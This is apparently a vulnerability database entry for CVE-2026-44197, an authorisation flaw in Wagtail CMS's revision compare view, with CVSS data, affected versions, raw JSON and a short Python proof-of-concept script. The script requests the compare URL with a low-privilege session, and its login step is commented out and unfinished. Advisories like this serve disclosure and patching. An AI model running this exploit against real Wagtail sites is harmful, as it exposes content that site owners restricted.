Security Vulnerability Report
CVE-2026-44197 CVSS 6.5 MEDIUM

CVE-2026-44197

Published: 2026-05-11 16:17:35
Last Modified: 2026-05-12 15:58:59

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could access revisions of the page through the revision compare view if they knew the primary key of two revisions. This could potentially result in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE (Wagtail < 7.0.7)
cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE (Wagtail >= 7.1, < 7.3.2)
Wagtail versions before 7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target configuration
target_url = "http://example.com"
username = "low_priv_user"
password = "user_password"
page_id = "1"     # Target Page ID
rev_id_1 = "10"   # Known Revision PK 1
rev_id_2 = "11"   # Known Revision PK 2

session = requests.Session()

# 1. Login to get session cookie
login_payload = {
    'username': username,
    'password': password,
    'csrfmiddlewaretoken': 'dummy_token'  # Needs to be fetched in real scenario
}
# session.post(f"{target_url}/admin/login/", data=login_payload)

# 2. Exploit the vulnerability
# The URL structure for comparing revisions in Wagtail
exploit_url = f"{target_url}/admin/pages/{page_id}/revisions/compare/{rev_id_1}/{rev_id_2}/"
response = session.get(exploit_url)

if response.status_code == 200:
    print("[+] Success! Sensitive information retrieved from revision compare view.")
    print(response.text)
else:
    print("[-] Failed to access the view.")

References

https://github.com/wagtail/wagtail/security/advisories/GHSA-c6wj-9vcj-75pj (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44197", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:34.823", "lastModified": "2026-05-12T15:58:58.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could access revisions of the page through the revision compare view if they knew the primary key of two revisions. This could potentially result in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-c6wj-9vcj-75pj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}